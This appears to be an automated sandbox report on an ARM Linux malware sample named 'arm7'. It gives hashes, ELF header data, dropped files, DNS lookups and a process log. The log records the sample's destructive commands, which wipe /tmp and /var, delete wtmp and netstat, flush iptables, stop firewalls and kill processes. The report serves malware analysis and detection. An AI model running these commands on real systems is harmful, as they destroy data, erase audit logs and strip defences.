              http://schemas.xmlsoap.org/soap/envelope/ | arm7, 5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | false | | high

                          Contacted IPs

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          41.214.230.5EXWofBp7D3Get hashmaliciousBrowse
                            197.213.165.2281u1hBVyy1iGet hashmaliciousBrowse
                              156.66.10.209armGet hashmaliciousBrowse

                                Domains


                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.9219280948873623
                                Encrypted:false
                                SSDEEP:3:5bkPn:pkP
                                MD5:FF001A15CE15CF062A3704CEA2991B5F
                                SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                                SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                                SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: auto_null.
                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.4613201402110088
                                Encrypted:false
                                SSDEEP:3:5bkrIZsXvn:pkckv
                                MD5:28FE6435F34B3367707BB1C5D5F6B430
                                SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                                SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                                SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: auto_null.monitor.
                                /proc/5365/oom_score_adj
                                Process:/usr/sbin/sshd
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):6
                                Entropy (8bit):1.7924812503605778
                                Encrypted:false
                                SSDEEP:3:ptn:Dn
                                MD5:CBF282CC55ED0792C33D10003D1F760A
                                SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                                SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                                SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: -1000.
                                /run/sshd.pid
                                Process:/usr/sbin/sshd
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):1.9219280948873623
                                Encrypted:false
                                SSDEEP:3:DTQv:P6
                                MD5:722854F46BE7C55F62C4033DA6ADE94B
                                SHA1:F74E66117C97C8CE0F8EEC94B7E2B92A9D38337F
                                SHA-256:E832BBB35129DD49811FBF5BA32A3611AC68E39C41F213A459E275ABBF1F5941
                                SHA-512:59CF8449A3AFF33E013E446F294A3C77EC973552A3C55C6B5C048EF7E62EEE5E4C3F08554E33D4016F6674389357393BB2568397D09FC067E557EF8D61D2251F
                                Malicious:false
                                Reputation:low
                                Preview: 5365.
                                /run/systemd/resolve/stub-resolv.conf
                                Process:/tmp/arm7
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):38
                                Entropy (8bit):3.3918926446809334
                                Encrypted:false
                                SSDEEP:3:KkZRAkd:KaAu
                                MD5:C7EA09D26E26605227076E0514A33038
                                SHA1:C3F9736E9AF7BD0885578859A50B205C8FA5FC8E
                                SHA-256:7E8AD76E0D200E93918CA2E93C99FF8ECD02071953BF1479819DB3AC0DBB6D07
                                SHA-512:17D0088725EB9991E9EB82E8A3DE0878E45E6F394BBC2AD260AA59C786FF0AD565E145E21256425D1C0ABE15F3ECB402EBB0A6A5E1C2D5BA7A4D95EC93A2861F
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: nameserver 8.8.8.8.nameserver 8.8.4.4.
                                /run/user/1000/pulse/pid
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):2.321928094887362
                                Encrypted:false
                                SSDEEP:3:E8v:E+
                                MD5:CE7838A8404B6917B0897DCE5B6C7095
                                SHA1:AB43E603CAF13ABBBCD8EC9793F4ACE12EB09F0B
                                SHA-256:1828BE2C5CDA4C0CFE7F0F8ABC2AE26E377E9D0CC02937E18CADAF866F30994A
                                SHA-512:F0C4216DCC182947DC9765A97DFC8C1454A8C6C03D8D6E815C0F64ACD390131F4AB1CB722DA134887A259FA78B917CE4C85AC54537573CAA45017DCDF145F4B6
                                Malicious:false
                                Reputation:low
                                Preview: 5403.
                                /var/log/gpu-manager.log
                                Process:/usr/bin/gpu-manager
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):1515
                                Entropy (8bit):4.825813629825568
                                Encrypted:false
                                SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555Ro7uRkoT:wPXXXe6vejpeC2HUR5WkpPpcvAdow959
                                MD5:7B48386106F00126E44F428D0193E1ED
                                SHA1:75F652293B2DE03A845A73B678A5CB7E9701A9F4
                                SHA-256:9F60B5D0D5C6F6CB3892E1687D16333F36E3BD450713B00FDF0B2BB90EC7312C
                                SHA-512:57D0856EC65558B4A843A4696B644AC3E80B3EA0E6EC1C2FAC7A00015B96EBB2CC30967EB8DEFC3E648E59AC6882F6A4F69468D4B6CD0FD60F9F343C206DBFBC
                                Malicious:false
                                Preview: log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
                                /var/run/gdm3.pid
                                Process:/usr/sbin/gdm3
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):1.9219280948873623
                                Encrypted:false
                                SSDEEP:3:FSen:Z
                                MD5:E43A10DB72BACE9741B8591C226777AE
                                SHA1:3A02096DA23FDF8B108D6F96E6F73B38DE0654A6
                                SHA-256:49F4D88EF58629CFA6F9CB3F4732FDF8DA06E81FC81CDD3F7CAD8ABA69DC6C80
                                SHA-512:392400F7CC2B6282BE6691FE137FE96524540D811A76A61E85F7FB36CB175D22F9D2E282AAFA97884CD8F95E79A0ED5AC36A3368D57DF03C97FBACEA6917FDB0
                                Malicious:false
                                Preview: 5579.

                                Static File Info

                                General

                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, stripped
                                Entropy (8bit):7.988872339172871
                                TrID:
                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                File name:arm7
                                File size:77060
                                MD5:9fc0975479e319f970c96eded3c2d001
                                SHA1:ff77399d8fb757636a3eae4909dbc33f4a00f09e
                                SHA256:f0c7eb51c588fa50e39bee022ea2c4f602842012b01f2ee025b91eb5eb50782f
                                SHA512:76e5429bd9c9501324084d504173e79354d8f24dc1852c02d8d0d2d4fab7468b133488a88f9ad3cb74d02c5aa7784dfe1165469bdfc1acd38bc723c908dc6164
                                SSDEEP:1536:TT9/c4ITNRcVbXye47li0XD3tbBm3wvkte38LRdeU98ZMrk1LVon2dt9:VkeBXv4Bi0XD3xs3wsk8L7jjY7q2x
                                File Content Preview:.ELF..............(.....8S..4...........4. ...(.....................%...%...............p'..p...p...................Q.td............................?..`UPX!.........2...2......k..........?.E.h;....#..$...o...m.W.l...ef?....$m.;I....j..8....+}.?..`.j.oB.!.

                                Static ELF Info

                                ELF header

                                Class:ELF32
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:ARM
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - Linux
                                ABI Version:0
                                Entry Point Address:0x15338
                                Flags:0x4000002
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:3
                                Section Header Offset:0
                                Section Header Size:40
                                Number of Section Headers:0
                                Header String Table Index:0

                                Program Segments

                                Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
                                LOAD | 0x0 | 0x8000 | 0x8000 | 0xe525 | 0xe525 | 4.0200 | 0x5 | R E | 0x8000 | |
                                LOAD | 0x2770 | 0x3a770 | 0x3a770 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8000 | |
                                GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |

                                Network Behavior

                                Network Port Distribution

                                TCP Packets


                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Nov 11, 2021 03:08:56.256854057 CET | 192.168.2.23 | 8.8.8.8 | 0x553f | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001)
                                Nov 11, 2021 03:08:56.256911039 CET | 192.168.2.23 | 8.8.8.8 | 0xd530 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Nov 11, 2021 03:08:56.273183107 CET | 8.8.8.8 | 192.168.2.23 | 0x553f | No error (0) | daisy.ubuntu.com |  | 162.213.33.108 | A (IP address) | IN (0x0001)
                                Nov 11, 2021 03:08:56.273183107 CET | 8.8.8.8 | 192.168.2.23 | 0x553f | No error (0) | daisy.ubuntu.com |  | 162.213.33.132 | A (IP address) | IN (0x0001)

                                System Behavior

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:/tmp/arm7
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te 
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /var/log/wtmp"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /var/log/wtmp
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /tmp/*"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /tmp/*
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /bin/netstat"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /bin/netstat
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "iptables -F"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/sbin/iptables
                                Arguments:iptables -F
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 busybox"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 busybox
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 perl"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 perl
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 python"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 python
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "service iptables stop"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:service iptables stop
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl --quiet is-active multi-user.target
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl list-unit-files --full --type=socket
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/bin/sed
                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                File size:121288 bytes
                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl stop iptables.service
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/sbin/iptables
                                Arguments:/sbin/iptables -F
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/sbin/iptables
                                Arguments:/sbin/iptables -X
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "service firewalld stop"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:service firewalld stop
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl --quiet is-active multi-user.target
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl list-unit-files --full --type=socket
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/sed
                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                File size:121288 bytes
